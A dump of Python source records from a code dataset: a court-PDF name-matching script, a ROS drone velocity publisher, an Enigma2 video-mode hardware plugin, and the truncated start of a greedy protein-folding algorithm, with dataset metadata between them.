seq=difflib.SequenceMatcher(None,elem_app,elem3)\n d=seq.ratio()\n percentage = (\"{0:.0f}\".format(d * 100))\n if int(percentage) >= 40:\n print(\"done1\")\n data_2.append((elem_app,elem3))'''\n'''for elem_case in data_strip[:1]:\n print(elem_case)\n if flag == True:\n break\n for elem2 in list_1:\n array = re.findall(r'[0-9]+', elem2)\n if len(array)>0:\n if array[0] == elem_case:\n data_1 = []\n data_1.append(elem_case)'''\n # data_3 = []\n'''data_2 = []\n\n for elem_app in data_strip[3:]:\n if flag == True:\n break\n for elem3 in list_1:\n seq=difflib.SequenceMatcher(None,elem_app,elem3)\n d=seq.ratio()\n percentage = (\"{0:.0f}\".format(d * 100))\n if int(percentage) >= 40:\n print(\"done1\")\n data_2.append((elem_app,elem3))\n data_3 = data_1 + data_2\n if len(data_3)>=2:\n csv_file = open('output_supreme_court_2017_pdf_location.csv','a')\n writer = csv.writer(csv_file)\n data_file_name = []\n data_file_name.append(name)\n writer.writerow(elem_list+data_file_name)\n print(elem_list)\n flag = True\n break'''\n 
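# The matching block above builds a fresh SequenceMatcher for every
# (name, line) pair and keeps pairs whose ratio clears 70%. difflib's
# get_close_matches wraps the same ratio test; a hedged sketch (cutoff=0.7
# mirrors the threshold used above):
import difflib

def fuzzy_hits(names, lines, cutoff=0.7):
    # keep each name that resembles at least one extracted PDF line
    return [name for name in names
            if difflib.get_close_matches(name, lines, n=1, cutoff=cutoff)]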
\n\n","repo_name":"abdulraoof789/Pythonprograms","sub_path":"link_pdf_name_bombay_high_court.py","file_name":"link_pdf_name_bombay_high_court.py","file_ext":"py","file_size_in_byte":7355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72431400193","text":"import rospy\nfrom geometry_msgs.msg import PoseStamped\nfrom geometry_msgs.msg import TwistStamped\nimport time\nfrom mavros_msgs.msg import State \nfrom mavros_msgs.srv import CommandBool, SetMode\n\nrospy.init_node('cont_position', anonymous=True)\nvelocity = TwistStamped()\ncurrent_pos = PoseStamped()\n\ndef current_pos_callback(position):\n global current_pos\n current_pos = position \n\ndef vel_callback(vel):\n global velocity\n print(\"vel_working\")\n velocity = vel\n # velocity_publisher.publish(velocity)\n\ncurrent_state = State() \ndef state_cb(state):\n global current_state \n current_state = state\n\n\nvelocity_publisher = rospy.Publisher('/mavros/setpoint_velocity/cmd_vel',TwistStamped, queue_size=10)\nsub_vel = rospy.Subscriber(\"cont_pos_msg\", TwistStamped , vel_callback )\npos = rospy.Subscriber('mavros/local_position/pose',PoseStamped,current_pos_callback)\nstate_sub = rospy.Subscriber('/mavros/state', State, state_cb)\n\n\nwhile True :\n restart = 0\n while current_state.armed != True :\n pass\n print(\"state1\")\n while current_pos.pose.position.z < 4 :\n pass\n print(\"state2\")\n while True:\n a = time.time() \n\n # sub_vel = rospy.Subscriber(\"cont_pos_msg\", TwistStamped , vel_callback )\n # t0 = rospy.Time.now().to_sec() \n # if rospy.Time.now().to_sec() - t0 > 0.01 :\n # print(rospy.Time.now().to_sec() - t0)\n # t0 = rospy.Time.now().to_sec()\n # velocity.twist.linear.z = 0.1 \n velocity_publisher.publish(velocity)\n print(velocity)\n if current_state.armed != True : \n print(\"restarting gggggggggggggggggggggggggggggg\")\n restart = 1\n break\n print(\"time dif\" ,time.time()-a)\n if restart == 1:\n continue\n\n","repo_name":"DarkcrusherX/RL-smartcopter","sub_path":"src/cont_msg.py","file_name":"cont_msg.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"24769290186","text":"# -*- coding: utf-8 -*-\nfrom Components.config import config, ConfigSlider, ConfigSelection, ConfigSubDict, ConfigYesNo, ConfigEnableDisable, ConfigOnOff, ConfigSubsection, ConfigBoolean, ConfigSelectionNumber, ConfigNothing, NoSave # storm - some config are required\nfrom Components.SystemInfo import SystemInfo\nfrom Tools.CList import CList\nfrom Tools.HardwareInfo import HardwareInfo\nfrom Components.About import about\nfrom Tools.Directories import fileExists\nfrom Components.Console import Console\nfrom os.path import isfile\nimport os\nfrom enigma import getDesktop\n\n# The \"VideoHardware\" is the interface to /proc/stb/video.\n# It generates hotplug events, and gives you the list of\n# available and preferred modes, as well as handling the currently\n# selected mode. 
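# The cont_msg.py record above publishes inside bare `while True` loops and
# waits for arming with `pass`, which pegs a CPU core. rospy's Rate object is
# the usual fix; a hedged sketch reusing the record's publisher and state
# callback (20 Hz is an arbitrary choice):
import rospy

rate = rospy.Rate(20)
while not rospy.is_shutdown() and not current_state.armed:
    rate.sleep()                      # yield instead of busy-waiting
while not rospy.is_shutdown():
    velocity_publisher.publish(velocity)
    rate.sleep()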
No other strict checking is done.\n\nconfig.av.edid_override = ConfigYesNo(default=True)\nchipsetstring = about.getChipSetString()\n\nHas24hz = SystemInfo[\"Has24hz\"]\n\naxis = {\"480i\": \"0 0 719 479\",\n \"480p\": \"0 0 719 479\",\n \"576i\": \"0 0 719 575\",\n \"576p\": \"0 0 719 575\",\n \"720p\": \"0 0 1279 719\",\n \"1080i\": \"0 0 1919 1079\",\n \"1080p\": \"0 0 1919 1079\",\n \"2160p30\": \"0 0 3839 2159\",\n \"2160p\": \"0 0 3839 2159\",\n \"smpte\": \"0 0 4095 2159\"}\n\n\nclass VideoHardware:\n rates = {} # high-level, use selectable modes.\n\n modes = {} # a list of (high-level) modes for a certain port.\n\n rates[\"PAL\"] = {\"50Hz\": {50: \"pal\"},\n \"60Hz\": {60: \"pal60\"},\n \"multi\": {50: \"pal\", 60: \"pal60\"}}\n\n rates[\"NTSC\"] = {\"60Hz\": {60: \"ntsc\"}}\n\n rates[\"Multi\"] = {\"multi\": {50: \"pal\", 60: \"ntsc\"}}\n\n rates[\"480i\"] = {\"60Hz\": {60: \"480i\"}}\n\n rates[\"576i\"] = {\"50Hz\": {50: \"576i\"}}\n\n rates[\"480p\"] = {\"60Hz\": {60: \"480p\"}}\n\n rates[\"576p\"] = {\"50Hz\": {50: \"576p\"}}\n\n rates[\"720p\"] = {\"50Hz\": {50: \"720p50\"},\n \"60Hz\": {60: \"720p\"},\n \"multi\": {50: \"720p50\", 60: \"720p\"},\n \"auto\": {50: \"720p50\", 60: \"720p\", 24: \"720p24\"}}\n\n rates[\"1080i\"] = {\"50Hz\": {50: \"1080i50\"},\n \"60Hz\": {60: \"1080i\"},\n \"multi\": {50: \"1080i50\", 60: \"1080i\"},\n \"auto\": {50: \"1080i50\", 60: \"1080i\", 24: \"1080p24\"}}\n\n rates[\"1080p\"] = {\"50Hz\": {50: \"1080p50\"},\n \"60Hz\": {60: \"1080p\"},\n \"multi\": {50: \"1080p50\", 60: \"1080p\"},\n \"auto\": {50: \"1080p50\", 60: \"1080p\", 24: \"1080p24\"}}\n\n rates[\"2160p30\"] = {\"25Hz\": {50: \"2160p25\"},\n \"30Hz\": {60: \"2160p30\"},\n \"multi\": {50: \"2160p25\", 60: \"2160p30\"},\n \"auto\": {50: \"2160p25\", 60: \"2160p30\", 24: \"2160p24\"}}\n\n rates[\"2160p\"] = {\"50Hz\": {50: \"2160p50\"},\n \"60Hz\": {60: \"2160p60\"},\n \"multi\": {50: \"2160p50\", 60: \"2160p60\"},\n \"auto\": {50: \"2160p50\", 60: \"2160p60\", 24: \"2160p24\"}}\n\n if HardwareInfo().get_device_name() in (\"dm900\", \"dm920\"):\n rates[\"2160p\"] = {\"50Hz\": {50: \"2160p50\"},\n \t\"60Hz\": {60: \"2160p60\"},\n \t\"multi\": {50: \"2160p50\", 60: \"2160p60\"}, \n \t\"auto\": {50: \"2160p50\", 60: \"2160p60\", 24: \"2160p24\"}}\n else:\n rates[\"2160p\"] = {\"50Hz\": {50:\n \t\"2160p50\"}, \"60Hz\": {60:\n \t\"2160p\"}, \"multi\": {50: \"2160p50\", 60: \"2160p\"},\n \t\"auto\": {50: \"2160p50\", 60: \"2160p\", 24: \"2160p24\"}}\n\n rates[\"smpte\"] = {\"50Hz\": {50: \"smpte50hz\"},\n \"60Hz\": {60: \"smpte60hz\"},\n \"30Hz\": {30: \"smpte30hz\"},\n \"25Hz\": {25: \"smpte25hz\"},\n \"24Hz\": {24: \"smpte24hz\"},\n \"auto\": {60: \"smpte60hz\"}}\n\n rates[\"PC\"] = {\n \"1024x768\": {60: \"1024x768\"}, # not possible on DM7025\n \"800x600\": {60: \"800x600\"}, # also not possible\n \"720x480\": {60: \"720x480\"},\n \"720x576\": {60: \"720x576\"},\n \"1280x720\": {60: \"1280x720\"},\n \"1280x720 multi\": {50: \"1280x720_50\", 60: \"1280x720\"},\n \"1920x1080\": {60: \"1920x1080\"},\n \"1920x1080 multi\": {50: \"1920x1080\", 60: \"1920x1080_50\"},\n \"1280x1024\": {60: \"1280x1024\"},\n \"1366x768\": {60: \"1366x768\"},\n \"1366x768 multi\": {50: \"1366x768\", 60: \"1366x768_50\"},\n \"1280x768\": {60: \"1280x768\"},\n \"640x480\": {60: \"640x480\"}\n }\n\n if HardwareInfo().get_device_name() in (\"one\", \"two\"):\n rates[\"480i\"] = {\"60hz\": {60: \"480i60hz\"}}\n\n rates[\"576i\"] = {\"50hz\": {50: \"576i50hz\"}}\n\n rates[\"480p\"] = {\"60hz\": {60: 
\"480p60hz\"}}\n\n rates[\"576p\"] = {\"50hz\": {50: \"576p50hz\"}}\n\n rates[\"720p\"] = {\"50hz\": {50: \"720p50hz\"},\n\t\t\t\"60hz\": {60: \"720p60hz\"},\n\t\t\t\"auto\": {60: \"720p60hz\"}}\n\n rates[\"1080i\"] = {\"50hz\": {50: \"1080i50hz\"},\n\t\t\t\"60hz\": {60: \"1080i60hz\"},\n\t\t\t\"auto\": {60: \"1080i60hz\"}}\n\n rates[\"1080p\"] = {\"50hz\": {50: \"1080p50hz\"},\n\t\t\t\"60hz\": {60: \"1080p60hz\"},\n\t\t\t\"30hz\": {30: \"1080p30hz\"},\n\t\t\t\"25hz\": {25: \"1080p25hz\"},\n\t\t\t\"24hz\": {24: \"1080p24hz\"},\n\t\t\t\"auto\": {60: \"1080p60hz\"}}\n\n rates[\"2160p\"] = {\"50hz\": {50: \"2160p50hz\"},\n\t\t\t\"60hz\": {60: \"2160p60hz\"},\n\t\t\t\"30hz\": {30: \"2160p30hz\"},\n\t\t\t\"25hz\": {25: \"2160p25hz\"},\n\t\t\t\"24hz\": {24: \"2160p24hz\"},\n\t\t\t\"auto\": {60: \"2160p60hz\"}}\n\n rates[\"2160p30\"] = {\"25hz\": {50: \"2160p25hz\"},\n\t\t\t\"30hz\": {60: \"2160p30hz\"},\n\t\t\t\"auto\": {60: \"2160p30hz\"}}\n\n if SystemInfo[\"HasScart\"]:\n modes[\"Scart\"] = [\"PAL\", \"NTSC\", \"Multi\"]\n if SystemInfo[\"HasComposite\"] and HardwareInfo().get_device_name() in (\"dm7020hd\", \"dm7020hdv2\", \"dm8000\"):\n modes[\"RCA\"] = [\"576i\", \"PAL\", \"NTSC\", \"Multi\"]\n if SystemInfo[\"HasYPbPr\"]:\n modes[\"YPbPr\"] = [\"720p\", \"1080i\", \"576p\", \"480p\", \"576i\", \"480i\"]\n if SystemInfo[\"Has2160p\"]:\n modes[\"DVI\"] = [\"720p\", \"1080p\", \"2160p\", \"1080i\", \"576p\", \"480p\", \"576i\", \"480i\"]\n if HardwareInfo().get_device_name() in (\"one\", \"two\"):\n modes[\"HDMI\"] = [\"720p\", \"1080p\", \"smpte\", \"2160p30\", \"2160p\", \"1080i\", \"576p\", \"576i\", \"480p\", \"480i\"]\n widescreen_modes = {\"720p\", \"1080p\", \"1080i\", \"2160p\", \"smpte\"}\n else:\n modes[\"DVI\"] = [\"720p\", \"1080p\", \"2160p\", \"2160p30\", \"1080i\", \"576p\", \"480p\", \"576i\", \"480i\"]\n\n def getOutputAspect(self):\n ret = (16, 9)\n port = config.av.videoport.value\n if port not in config.av.videomode:\n print(\"[VideoHardware] current port not available in getOutputAspect!!! 
force 16:9\")\n else:\n mode = config.av.videomode[port].value\n force_widescreen = self.isWidescreenMode(port, mode)\n is_widescreen = force_widescreen or config.av.aspect.value in (\"16_9\", \"16_10\")\n is_auto = config.av.aspect.value == \"auto\"\n if is_widescreen:\n if force_widescreen:\n pass\n else:\n aspect = {\"16_9\": \"16:9\", \"16_10\": \"16:10\"}[config.av.aspect.value]\n if aspect == \"16:10\":\n ret = (16, 10)\n elif is_auto:\n if isfile(\"/proc/stb/vmpeg/0/aspect\"):\n try:\n aspect_str = open(\"/proc/stb/vmpeg/0/aspect\", \"r\").read()\n except IOError:\n print(\"[Videomode] Read /proc/stb/vmpeg/0/aspect failed!\")\n elif isfile(\"/sys/class/video/screen_mode\"):\n try:\n aspect_str = open(\"/sys/class/video/screen_mode\", \"r\").read()\n except IOError:\n print(\"[Videomode] Read /sys/class/video/screen_mode failed!\")\n if aspect_str == \"1\": # 4:3\n ret = (4, 3)\n else: # 4:3\n ret = (4, 3)\n return ret\n\n def __init__(self):\n self.last_modes_preferred = []\n self.on_hotplug = CList()\n self.current_mode = None\n self.current_port = None\n\n self.readAvailableModes()\n self.readPreferredModes()\n self.widescreen_modes = set([\"720p\", \"1080i\", \"1080p\", \"2160p\", \"2160p30\"]).intersection(*[self.modes_available])\n\n if \"DVI-PC\" in self.modes and not self.getModeList(\"DVI-PC\"):\n print(\"[VideoHardware] remove DVI-PC because of not existing modes\")\n del self.modes[\"DVI-PC\"]\n if \"Scart\" in self.modes and not self.getModeList(\"Scart\"):\n print(\"[VideoHardware] remove Scart because of not existing modes\")\n del self.modes[\"Scart\"]\n\n self.createConfig()\n\n # take over old AVSwitch component :)\n from Components.AVSwitch import AVSwitch\n config.av.aspectratio.notifiers = []\n config.av.tvsystem.notifiers = []\n config.av.wss.notifiers = []\n AVSwitch.getOutputAspect = self.getOutputAspect\n\n config.av.aspect.addNotifier(self.updateAspect)\n config.av.wss.addNotifier(self.updateAspect)\n config.av.policy_169.addNotifier(self.updateAspect)\n config.av.policy_43.addNotifier(self.updateAspect)\n\n def readAvailableModes(self):\n if isfile(\"/sys/class/amhdmitx/amhdmitx0/disp_cap\"):\n print(\"[Videomode] Read /sys/class/amhdmitx/amhdmitx0/disp_cap\")\n modes = open(\"/sys/class/amhdmitx/amhdmitx0/disp_cap\").read()[:-1].replace('*', '')\n self.modes_available = modes.splitlines()\n return self.modes_available\n else:\n try:\n modes = open(\"/proc/stb/video/videomode_choices\").read()[:-1]\n except (IOError, OSError):\n print(\"[Videomode] Read /proc/stb/video/videomode_choices failed!\")\n self.modes_available = []\n return\n self.modes_available = modes.split(' ')\n\n def readPreferredModes(self):\n if config.av.edid_override.value == False:\n if isfile(\"/sys/class/amhdmitx/amhdmitx0/disp_cap\"):\n modes = open(\"/sys/class/amhdmitx/amhdmitx0/disp_cap\").read()[:-1].replace('*', '')\n self.modes_preferred = modes.splitlines()\n print(\"[Videomode] VideoHardware reading disp_cap modes: \", self.modes_preferred)\n else:\n try:\n modes = open(\"/proc/stb/video/videomode_edid\").read()[:-1]\n self.modes_preferred = modes.split(' ')\n print(\"[Videomode] VideoHardware reading edid modes: \", self.modes_preferred)\n except (IOError, OSError):\n print(\"[Videomode] Read /proc/stb/video/videomode_edid failed!\")\n try:\n modes = open(\"/proc/stb/video/videomode_preferred\").read()[:-1]\n self.modes_preferred = modes.split(' ')\n except IOError:\n print(\"[Videomode] Read /proc/stb/video/videomode_preferred failed!\")\n self.modes_preferred = 
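# A note on getOutputAspect above: aspect_str is only assigned inside the two
# isfile branches, so when neither node exists (or the read raises IOError)
# the comparison `aspect_str == "1"` raises NameError. Seeding a default
# before probing keeps the intended 4:3 fallback, e.g.:
#     aspect_str = "0"  # default when the /proc and /sys probes fail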
self.modes_available\n\n if len(self.modes_preferred) <= 1:\n self.modes_preferred = self.modes_available\n print(\"[Videomode] VideoHardware reading preferred modes is empty, using all video modes\")\n else:\n self.modes_preferred = self.modes_available\n print(\"[Videomode] VideoHardware reading preferred modes override, using all video modes\")\n\n self.last_modes_preferred = self.modes_preferred\n\n # check if a high-level mode with a given rate is available.\n def isModeAvailable(self, port, mode, rate):\n rate = self.rates[mode][rate]\n for mode in rate.values():\n if port == \"DVI\":\n if mode not in self.modes_preferred:\n return False\n else:\n if mode not in self.modes_available:\n return False\n return True\n\n def isWidescreenMode(self, port, mode):\n return mode in self.widescreen_modes\n\n def setMode(self, port, mode, rate, force=None):\n print(\"[VideoHardware] setMode - port:\", port, \"mode:\", mode, \"rate:\", rate)\n # we can ignore \"port\"\n self.current_mode = mode\n self.current_port = port\n modes = self.rates[mode][rate]\n\n mode_50 = modes.get(50)\n mode_60 = modes.get(60)\n mode_30 = modes.get(30)\n mode_25 = modes.get(25)\n mode_24 = modes.get(24)\n\n if mode_50 is None or force == 60:\n mode_50 = mode_60\n if mode_60 is None or force == 50:\n mode_60 = mode_50\n\n if mode_30 is None or force:\n mode_30 = mode_60\n if force == 50:\n mode_30 = mode_50\n if mode_25 is None or force:\n mode_25 = mode_60\n if force == 50:\n mode_25 = mode_50\n\n if mode_24 is None or force:\n mode_24 = mode_60\n if force == 50:\n mode_24 = mode_50\n\n if HardwareInfo().get_device_name() in (\"one\", \"two\"): # storm - this part should be here\n amlmode = list(modes.values())[0]\n oldamlmode = self.getAMLMode()\n f = open(\"/sys/class/display/mode\", \"w\")\n f.write(amlmode)\n f.close()\n print(\"[AVSwitch] Amlogic setting videomode to mode: %s\" % amlmode)\n f = open(\"/etc/u-boot.scr.d/000_hdmimode.scr\", \"w\")\n f.write(\"setenv hdmimode %s\" % amlmode)\n f.close()\n f = open(\"/etc/u-boot.scr.d/000_outputmode.scr\", \"w\")\n f.write(\"setenv outputmode %s\" % amlmode)\n f.close()\n os.system(\"update-autoexec\")\n f = open(\"/sys/class/ppmgr/ppscaler\", \"w\")\n f.write(\"1\")\n f.close()\n f = open(\"/sys/class/ppmgr/ppscaler\", \"w\")\n f.write(\"0\")\n f.close()\n f = open(\"/sys/class/video/axis\", \"w\")\n f.write(axis[mode])\n f.close()\n f = open(\"/sys/class/graphics/fb0/stride\", \"r\")\n stride = f.read().strip()\n f.close()\n limits = [int(x) for x in axis[mode].split()]\n config.osd.dst_left = ConfigSelectionNumber(default=limits[0], stepwidth=1, min=limits[0] - 255, max=limits[0] + 255, wraparound=False)\n config.osd.dst_top = ConfigSelectionNumber(default=limits[1], stepwidth=1, min=limits[1] - 255, max=limits[1] + 255, wraparound=False)\n config.osd.dst_width = ConfigSelectionNumber(default=limits[2], stepwidth=1, min=limits[2] - 255, max=limits[2] + 255, wraparound=False)\n config.osd.dst_height = ConfigSelectionNumber(default=limits[3], stepwidth=1, min=limits[3] - 255, max=limits[3] + 255, wraparound=False)\n\n if oldamlmode != amlmode:\n config.osd.dst_width.setValue(limits[0])\n config.osd.dst_height.setValue(limits[1])\n config.osd.dst_left.setValue(limits[2])\n config.osd.dst_top.setValue(limits[3])\n config.osd.dst_left.save()\n config.osd.dst_width.save()\n config.osd.dst_top.save()\n config.osd.dst_height.save()\n print(\"[AVSwitch] Framebuffer mode:%s stride:%s axis:%s\" % (getDesktop(0).size().width(), stride, axis[mode]))\n return\n\n try:\n 
print(\"[Videomode] Write to /proc/stb/video/videomode_50hz\")\n open(\"/proc/stb/video/videomode_50hz\", \"w\").write(mode_50)\n print(\"[Videomode] Write to /proc/stb/video/videomode_60hz\")\n open(\"/proc/stb/video/videomode_60hz\", \"w\").write(mode_60)\n except IOError:\n print(\"[Videomode] Write to /proc/stb/video/videomode_50hz failed.\")\n print(\"[Videomode] Write to /proc/stb/video/videomode_60hz failed.\")\n if isfile(\"/proc/stb/video/videomode\"):\n try:\n # fallback if no possibility to setup 50 hz mode\n open(\"/proc/stb/video/videomode\", \"w\").write(mode_50)\n except IOError:\n print(\"[Videomode] Write to /proc/stb/video/videomode failed!\")\n elif isfile(\"/sys/class/display/mode\"):\n try:\n # fallback if no possibility to setup 50 hz mode\n open(\"/sys/class/display/mode\", \"w\").write(mode_50)\n except IOError:\n print(\"[Videomode] Write to /sys/class/display/mode failed!\")\n\n try:\n open(\"/etc/videomode\", \"w\").write(mode_50) # use 50Hz mode (if available) for booting\n except IOError:\n print(\"[VideoHardware] writing initial videomode to /etc/videomode failed.\")\n\n if SystemInfo[\"Has24hz\"]:\n try:\n print(\"[Videomode] Write to /proc/stb/video/videomode_24hz\")\n open(\"/proc/stb/video/videomode_24hz\", \"w\").write(mode_24)\n except IOError:\n print(\"[Videomode] Write to /proc/stb/video/videomode_24hz failed.\")\n\n self.updateAspect(None)\n\n def saveMode(self, port, mode, rate):\n print(\"[VideoHardware] saveMode\", port, mode, rate)\n config.av.videoport.value = port\n config.av.videoport.save()\n if port in config.av.videomode:\n config.av.videomode[port].value = mode\n config.av.videomode[port].save()\n if mode in config.av.videorate:\n config.av.videorate[mode].value = rate\n config.av.videorate[mode].save()\n\n def getAMLMode(self):\n f = open(\"/sys/class/display/mode\", \"r\")\n currentmode = f.read().strip()\n f.close()\n return currentmode[:-4]\n\n def isPortAvailable(self, port):\n # fixme\n return True\n\n def isPortUsed(self, port):\n if port == \"DVI\":\n self.readPreferredModes()\n return len(self.modes_preferred) != 0\n else:\n return True\n\n def getPortList(self):\n return [port for port in self.modes if self.isPortAvailable(port)]\n\n # get a list with all modes, with all rates, for a given port.\n def getModeList(self, port):\n print(\"[Videomode] VideoHardware getModeList for port\", port)\n res = []\n if HardwareInfo().get_device_name() not in (\"one\", \"two\"):\n for mode in self.modes[port]:\n # list all rates which are completely valid\n rates = [rate for rate in self.rates[mode] if self.isModeAvailable(port, mode, rate)]\n\n # if at least one rate is ok, add this mode\n if len(rates):\n res.append((mode, rates))\n else:\n res = [('1080p', ['50hz', '60hz', '30hz', '24hz', '25hz']),\n ('2160p', ['50hz', '60hz', '30hz', '24hz', '25hz']),\n ('720p', ['50hz', '60hz']), ('1080i', ['50hz', '60hz']),\n ('576p', ['50hz']), ('576i', ['50hz']), ('480p', ['60hz']), ('480i', ['60hz'])]\n return res\n\n def createConfig(self, *args):\n has_hdmi = HardwareInfo().has_hdmi()\n lst = []\n\n config.av.videomode = ConfigSubDict()\n config.av.videorate = ConfigSubDict()\n\n # create list of output ports\n portlist = self.getPortList()\n for port in portlist:\n descr = port\n if descr == \"DVI\" and has_hdmi:\n descr = \"HDMI\"\n elif descr == \"DVI-PC\" and has_hdmi:\n descr = \"HDMI-PC\"\n if \"HDMI\" in descr:\n lst.insert(0, (port, descr))\n else:\n lst.append((port, descr))\n\n # create list of available modes\n modes = 
self.getModeList(port)\n if len(modes):\n config.av.videomode[port] = ConfigSelection(choices=[mode for (mode, rates) in modes])\n for (mode, rates) in modes:\n ratelist = []\n for rate in rates:\n if rate == \"auto\" and not Has24hz:\n continue\n ratelist.append((rate, rate))\n config.av.videorate[mode] = ConfigSelection(choices=ratelist)\n config.av.videoport = ConfigSelection(choices=lst)\n\n def setConfiguredMode(self):\n port = config.av.videoport.value\n if port not in config.av.videomode:\n print(\"[Videomode] VideoHardware current port not available, not setting videomode\")\n return\n\n mode = config.av.videomode[port].value\n\n if mode not in config.av.videorate:\n print(\"[Videomode] VideoHardware current mode not available, not setting videomode\")\n return\n\n if HardwareInfo().get_device_name() in (\"one\", \"two\") and (mode.find(\"0p30\") != -1 or mode.find(\"0p24\") != -1 or mode.find(\"0p25\") != -1):\n match = re.search(r\"(\\d*?[ip])(\\d*?)$\", mode)\n mode = match.group(1)\n rate = match.group(2) + \"Hz\"\n else:\n rate = config.av.videorate[mode].value\n self.setMode(port, mode, rate)\n\n def updateAspect(self, cfgelement):\n # determine aspect = {any,4:3,16:9,16:10}\n # determine policy = {bestfit,letterbox,panscan,nonlinear}\n\n # based on;\n # config.av.videoport.value: current video output device\n # Scart:\n # config.av.aspect:\n # 4_3: use policy_169\n # 16_9,16_10: use policy_43\n # auto always \"bestfit\"\n # config.av.policy_169\n # letterbox use letterbox\n # panscan use panscan\n # scale use bestfit\n # config.av.policy_43\n # pillarbox use panscan\n # panscan use letterbox (\"panscan\" is just a bad term, it's inverse-panscan)\n # nonlinear use nonlinear\n # scale use bestfit\n\n port = config.av.videoport.value\n if port not in config.av.videomode:\n print(\"[Videomode] VideoHardware current port not available, not setting videomode\")\n return\n mode = config.av.videomode[port].value\n\n force_widescreen = self.isWidescreenMode(port, mode)\n\n is_widescreen = force_widescreen or config.av.aspect.value in (\"16_9\", \"16_10\")\n is_auto = config.av.aspect.value == \"auto\"\n policy2 = \"policy\" # use main policy\n\n if is_widescreen:\n if force_widescreen:\n aspect = \"16:9\"\n else:\n aspect = {\"16_9\": \"16:9\", \"16_10\": \"16:10\"}[config.av.aspect.value]\n policy_choices = {\"pillarbox\": \"panscan\", \"panscan\": \"letterbox\", \"nonlinear\": \"nonlinear\", \"scale\": \"bestfit\", \"full\": \"full\", \"auto\": \"auto\"}\n policy = policy_choices[config.av.policy_43.value]\n policy2_choices = {\"letterbox\": \"letterbox\", \"panscan\": \"panscan\", \"scale\": \"bestfit\", \"full\": \"full\", \"auto\": \"auto\"}\n policy2 = policy2_choices[config.av.policy_169.value]\n elif is_auto:\n aspect = \"any\"\n if \"auto\" in config.av.policy_43.choices:\n policy = \"auto\"\n else:\n policy = \"bestfit\"\n else:\n aspect = \"4:3\"\n policy = {\"letterbox\": \"letterbox\", \"panscan\": \"panscan\", \"scale\": \"bestfit\", \"full\": \"full\", \"auto\": \"auto\"}[config.av.policy_169.value]\n\n if not config.av.wss.value:\n wss = \"auto(4:3_off)\"\n else:\n wss = \"auto\"\n\n print(\"[Videomode] VideoHardware -> setting aspect, policy, policy2, wss\", aspect, policy, policy2, wss)\n if chipsetstring.startswith(\"meson-6\") and HardwareInfo().get_device_name() not in (\"one\", \"two\"):\n arw = \"0\"\n if config.av.policy_43.value == \"bestfit\":\n arw = \"10\"\n if config.av.policy_43.value == \"panscan\":\n arw = \"11\"\n if config.av.policy_43.value == 
\"letterbox\":\n arw = \"12\"\n try:\n open(\"/sys/class/video/screen_mode\", \"w\").write(arw)\n except IOError:\n print(\"[Videomode] Write to /sys/class/video/screen_mode failed.\")\n elif HardwareInfo().get_device_name() in (\"one\", \"two\"):\n arw = \"0\"\n if config.av.policy_43.value == \"bestfit\":\n arw = \"10\"\n if config.av.policy_43.value == \"letterbox\":\n arw = \"11\"\n if config.av.policy_43.value == \"panscan\":\n arw = \"12\"\n try:\n open(\"/sys/class/video/screen_mode\", \"w\").write(arw)\n except IOError:\n print(\"[Videomode] Write to /sys/class/video/screen_mode failed.\")\n\n try:\n open(\"/proc/stb/video/aspect\", \"w\").write(aspect)\n except IOError:\n print(\"[Videomode] Write to /proc/stb/video/aspect failed.\")\n try:\n open(\"/proc/stb/video/policy\", \"w\").write(policy)\n except IOError:\n print(\"[Videomode] Write to /proc/stb/video/policy failed.\")\n try:\n open(\"/proc/stb/denc/0/wss\", \"w\").write(wss)\n except IOError:\n print(\"[Videomode] Write to /proc/stb/denc/0/wss failed.\")\n try:\n open(\"/proc/stb/video/policy2\", \"w\").write(policy2)\n except IOError:\n print(\"[Videomode] Write to /proc/stb/video/policy2 failed.\")\n\n\nvideo_hw = VideoHardware()\nvideo_hw.setConfiguredMode()\n","repo_name":"budinev/enigma2-flodge","sub_path":"lib/python/Plugins/SystemPlugins/Videomode/VideoHardware.py","file_name":"VideoHardware.py","file_ext":"py","file_size_in_byte":30234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73472774273","text":"# imports\nfrom copy import deepcopy\nimport time\n \n\nclass Greedy_lookahead:\n def __init__(self, protein, grid, lookahead):\n self.protein = protein\n self.length = protein.length\n self.grid = grid\n self.emptyGrid = deepcopy(grid)\n self.allMoves = []\n self.minimalScore = 0\n self.minimalGrid = None\n self.minimalPerformedMove = None\n self.recursionAmount = 0\n self.states = 0 \n self.lookahead = lookahead\n\n self.perform_first_moves() \n self.outer_loop()\n self.changeMovesList()\n\n def perform_first_moves(self):\n # append the first 2 folding moves to the list moveList\n # places the amino acids in the grid on their calculated place\n self.allMoves.append(self.grid.checkPossibleMoves()[0])\n self.grid.performMove(self.grid.checkPossibleMoves()[0], self.protein.code[0])\n self.allMoves.append(self.grid.checkPossibleMoves()[3])\n self.grid.performMove(self.grid.checkPossibleMoves()[3], self.protein.code[1])\n \n def outer_loop(self):\n start = time.time()\n # perform recursion_01 as long as there are amino acids to fold \n while self.protein.length > self.grid.totalMoves:\n grid = deepcopy(self.grid)\n self.recursion_01(grid, self.allMoves, 0, self.length, None, self.grid.totalMoves)\n self.allMoves.append(self.minimalPerformedMove)\n\n # place the amino acid on the right place in the grid\n self.grid.performMove(self.minimalPerformedMove, self.protein.code[self.grid.totalMoves])\n self.minimalPerformedMove = None\n self.minimalScore = 0\n print(str(self.grid.totalMoves) + \" of the \" + str(self.protein.length) + \" aminoacid are already placed in the grid\")\n end = time.time()\n print(\"The folding of the protein can be found in the new created png file\")\n print(\"The score of the folding is: \" + str(self.grid.score()))\n print(\"The algorithme has taken: \" + str(end-start) + \" seconds\")\n print(\"total states = \" + str(self.states))\n \n \n def recursion_01(self, grid, allMoves, depth, length, firstMove, numberOfPerformedMoves):\n 
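# The VideoHardware record above repeats the open/write/except-IOError pattern
# for more than a dozen /proc and /sys nodes. A small helper (a sketch, not
# part of the original plugin) keeps the log-and-continue behaviour in one place:
def write_proc(path, value):
    # write a procfs/sysfs node, logging failures in the plugin's own style
    try:
        with open(path, "w") as f:
            f.write(value)
    except (IOError, OSError):
        print("[Videomode] Write to %s failed." % path)

# usage: write_proc("/proc/stb/video/aspect", aspect)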
